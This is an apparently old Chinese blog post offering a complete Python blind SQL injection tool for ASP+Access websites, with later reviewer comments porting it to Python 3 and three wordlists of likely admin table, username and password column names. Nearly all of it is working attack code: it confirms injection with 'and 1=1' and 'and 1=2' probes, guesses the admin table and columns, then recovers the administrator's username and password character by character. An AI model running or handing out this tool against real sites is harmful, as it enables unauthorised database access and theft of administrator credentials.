
Python实现ASP+ACCESS注入,不用SOCKET

王朝asp·作者佚名  2006-01-09

不用SOCKET是因为个人感觉Python的3个HTTP协议的模块实在是功能太强了.

虽然它们的底层还是通过SOCKET实现的.

三个HTTP模块就是 httplib、urllib、urllib2(这是 Python 2 的模块名;在 Python 3 中已合并为 http.client、urllib.request 和 urllib.error。下面的脚本按 Python 2.3 编写,print 语句、raw_input 和 urllib.urlopen 在 Python 3 下都需要改写)

呵呵

CODE

代码:

--------------------------------------------------------------------------------

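#!/usr/bin/python

# ASP ACCESS SQL Injection Test

# Written by ToToDoDo (QQ:8924007) Email: osbbs@osbbs.com
#
# Reviewer notes:
#   * This is a boolean-based blind SQL injection tool for ASP + Access
#     (Jet SQL).  Every payload is appended verbatim to the user-supplied
#     URL and the response is classified by whether a user-chosen "judge"
#     string appears in it.  Use only against systems you are authorised
#     to test.
#   * Runs on Python 2 and 3.  The original was Python-2-only (print
#     statements, raw_input, string.join/strip, urllib.urlopen).
#   * Payload strings are kept byte-for-byte identical to the original so
#     behaviour against a target is unchanged.  Changes that DO alter
#     behaviour are marked in the comments below.

from sys import exit

try:  # Python 3
    from urllib.request import urlopen
    from urllib.error import HTTPError
except ImportError:  # Python 2
    from urllib import urlopen

    class HTTPError(Exception):
        """Never raised by Python 2's urllib.urlopen (it returns the error
        page as a normal response); defined so the except clause in
        _fetch() is valid on both versions."""

try:
    raw_input
except NameError:  # Python 3
    raw_input = input

# Set by main() from user input; read by _probe().
url = ""
judge = ""

# Results.  Kept as module globals for backward compatibility with the
# original script, which assigned them from get_username()/get_password().
# Initialised here so main() cannot hit a NameError when nothing is found.
username = ""
password = ""

# Longest username/password the length probe will look for (original: range(1, 51)).
MAX_LEN = 50

# Character codes tried for each position, in the original's search order:
# digits, lowercase, uppercase, punctuation, high bytes, control characters.
CHAR_ORDER = [
    code
    for rng in (range(48, 58), range(97, 123), range(65, 91), range(33, 48),
                range(58, 65), range(91, 97), range(123, 256), range(1, 33))
    for code in rng
]


def _read_text(resp):
    """Return the body of an open urlopen() response as text.

    Python 2 already returns str; Python 3 returns bytes, which are decoded
    with the charset the server declared (UTF-8 with replacement
    otherwise) so that ``judge in body`` works on both versions.
    """
    body = resp.read()
    if isinstance(body, str):
        return body
    info = resp.info()
    charset = None
    if hasattr(info, "get_content_charset"):
        charset = info.get_content_charset()
    return body.decode(charset or "utf-8", "replace")


def _fetch(full_url):
    """Fetch *full_url* and return its body as text, always closing the socket.

    On Python 3 a 4xx/5xx reply raises HTTPError; for blind injection the
    "error page" frequently IS a 500, so its body is returned instead of
    letting the exception abort the scan (matches Python 2 urllib, which
    never raised here).
    """
    try:
        resp = urlopen(full_url)
    except HTTPError as err:
        resp = err
    try:
        return _read_text(resp)
    finally:
        resp.close()


def _probe(sql):
    """Append *sql* to the global ``url`` and report whether the page still
    contains the global ``judge`` string, i.e. the injected condition held.

    Behaviour change: plain substring test.  The original used re.search,
    so a judge string containing regex metacharacters ("a.b", "1+1") was
    silently interpreted as a pattern.
    """
    return judge in _fetch(url + sql)


def _choose(probe):
    """Return *probe* if the caller supplied one, else the live HTTP probe."""
    return _probe if probe is None else probe


def _read_wordlist(path):
    """Return the non-empty, stripped lines of *path*; the file is closed.

    Raises IOError/OSError if the wordlist is missing, as the original did.
    """
    with open(path) as handle:
        return [line.strip() for line in handle if line.strip()]


def get_tablename(probe=None):
    """Try every name in table.txt with ``exists(select * from <name>)``.

    On the first hit, chase the name and password columns (which in turn
    extract the credentials) and return the table name.  Returns None when
    no name in the wordlist exists on the target.

    ``probe`` is an optional ``callable(sql_suffix) -> bool`` used instead
    of live HTTP requests (for testing); omit it in normal use.
    """
    probe = _choose(probe)
    for table in _read_wordlist("table.txt"):
        sql = "%20and%20exists%20(select%20*%20from%20" + table + ")"
        if not probe(sql):
            print("Error: %s" % table)
            continue
        print("Found the admin table name: %s\n" % table)
        print("Now! Start to get name column from %s table" % table)
        get_namecolumn(table, probe)
        print("Now! Start to get password column from %s table" % table)
        get_passwordcolumn(table, probe)
        return table
    return None


def _find_column(tablename, wordlist, label, probe):
    """Return the first name in *wordlist* that is a column of *tablename*,
    probed with ``exists(select <col> from <table>)``; None if none is."""
    for column in _read_wordlist(wordlist):
        sql = ("%20and%20exists%20(select%20" + column
               + "%20from%20" + tablename + ")")
        if probe(sql):
            print("Found the %s column from admin table: %s\n" % (label, column))
            return column
        print("Error: %s" % column)
    return None


def get_namecolumn(tablename, probe=None):
    """Find the username column of *tablename* from namecolumn.txt, then
    extract the username.  Returns the column name, or None if not found."""
    probe = _choose(probe)
    column = _find_column(tablename, "namecolumn.txt", "name", probe)
    if column is not None:
        get_usernamelenth(tablename, column, probe)
    return column


def get_passwordcolumn(tablename, probe=None):
    """Find the password column of *tablename* from passwordcolumn.txt, then
    extract the password.  Returns the column name, or None if not found."""
    probe = _choose(probe)
    column = _find_column(tablename, "passwordcolumn.txt", "password", probe)
    if column is not None:
        get_passwordlenth(tablename, column, probe)
    return column


def _find_length(tablename, column, label, probe):
    """Return the length (1..MAX_LEN) of *column* in the first row, or None.

    The payload ``1=(select top 1 count(*) from t where len(col)=n)`` is only
    unambiguous when exactly one row has that length -- the single-admin
    case the original script assumes.
    """
    for length in range(1, MAX_LEN + 1):
        sql = ("%20and%201=(select%20top%201%20Count(*)%20From%20" + tablename
               + "%20where%20len(" + column + ")=" + str(length) + ")")
        if probe(sql):
            print("Found the lenth of the %s: %d\n" % (label, length))
            return length
        print("Error: %d" % length)
    return None


def get_usernamelenth(tablename, namecolumn, probe=None):
    """Find the username length, then extract the username.
    Returns the length, or None if no length up to MAX_LEN matched."""
    probe = _choose(probe)
    length = _find_length(tablename, namecolumn, "username", probe)
    if length is not None:
        get_username(tablename, namecolumn, length, probe)
    return length


def get_passwordlenth(tablename, passwordcolumn, probe=None):
    """Find the password length, then extract the password.
    Returns the length, or None if no length up to MAX_LEN matched."""
    probe = _choose(probe)
    length = _find_length(tablename, passwordcolumn, "password", probe)
    if length is not None:
        get_password(tablename, passwordcolumn, length, probe)
    return length


def _extract(tablename, column, length, label, probe):
    """Recover *length* characters of *column* one position at a time.

    Each position is brute-forced with ``Asc(mid(col, pos, 1)) = code`` over
    CHAR_ORDER (one request per candidate, so up to 255 per character).

    Behaviour change: a position that no code matches is recorded as '?'
    so later characters keep their true offset; the original appended
    nothing and silently shifted everything after the gap one place left.
    """
    chars = []
    for pos in range(1, length + 1):
        print("Now! Crack the left %d of the %s Waiting~~~~~~~" % (pos, label))
        for code in CHAR_ORDER:
            sql = ("%20and%201=(select%20top%201%20count(*)%20from%20" + tablename
                   + "%20where%20Asc(mid(" + column + "," + str(pos) + ",1))="
                   + str(code) + ")")
            if probe(sql):
                chars.append(chr(code))
                break
        else:
            chars.append("?")
    value = "".join(chars)
    print("Found the %s = : %s\n" % (label, value))
    return value


def get_username(tablename, namecolumn, lenth, probe=None):
    """Extract the username of *lenth* characters; also stored in the
    module global ``username`` for compatibility.  Returns the string."""
    global username
    username = _extract(tablename, namecolumn, lenth, "username", _choose(probe))
    return username


def get_password(tablename, passwordcolumn, lenth, probe=None):
    """Extract the password of *lenth* characters; also stored in the
    module global ``password`` for compatibility.  Returns the string."""
    global password
    password = _extract(tablename, passwordcolumn, lenth, "password", _choose(probe))
    return password


def main():
    """Interactive entry point.

    Asks for a URL and a judge string, confirms the parameter is injectable
    (``and 1=1`` keeps the judge string, ``and 1=2`` removes it), then
    enumerates the admin table, its columns and the first row's credentials.
    """
    global url, judge
    print("\n########################################################################\n")
    print(" ASP+ACCESS SQL Injection Scripts By ToToDoDo with Python 2.3.x(QQ:8924007)")
    print(" Email: osbbs@msn.com\n")
    print("========================================================================")
    # Backslash escaped: "\P" was an invalid escape sequence in the original.
    print("""Usage:
C:\\Python23>python asp_inject.py
Supply a URL to test inject = http://127.0.0.1/article/list.asp?id=3
Supply some string in correct page but not in error page to help this script to
judge properly.
Judge string = test\n""")
    print("########################################################################\n")

    url = raw_input("Supply a URL to test inject = ")
    if url == "":
        print("U must supply a URL with '.asp?xxx=' in")
        exit(1)

    judge = raw_input("\nSupply some string in correct page but not in error page "
                      "to help this script to judge properly.\n\nJudge string = ")
    if judge == "":
        print("U must supply a string to help judge!")
        exit(1)

    # A usable oracle needs BOTH outcomes: true keeps the judge string,
    # false drops it.  Both present or both absent means no injection
    # (or a bad judge string), so nothing further is attempted.
    if _probe("%20and%201=1") and not _probe("%20and%201=2"):
        print("\n\n\nFound injection: %s\n\n\nNow,start to get the table name!\n" % url)
        if get_tablename() is None:
            # Original crashed with NameError on username/password here.
            print("No table from table.txt exists on the target.")
        else:
            print("\n\n\nThe admin's account name is %s\nThe admin's password is %s"
                  % (username, password))
    else:
        print("Can't be Injected")


if __name__ == "__main__":
    main()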

--------------------------------------------------------------------------------

需要3个字典文件(放在脚本的运行目录下,每行一个候选名字;脚本逐行用 exists(select ...) 探测,命中第一个就停止,后面的不再尝试):

table.txt:

user

userinfo

admintable

admin

article_admin

namecolumn.txt:

name

username

u_name

uname

adminname

passwordcolumn.txt

pass

adminpass

pwd

password

passwd

admin_pass

admin_password

 
 
 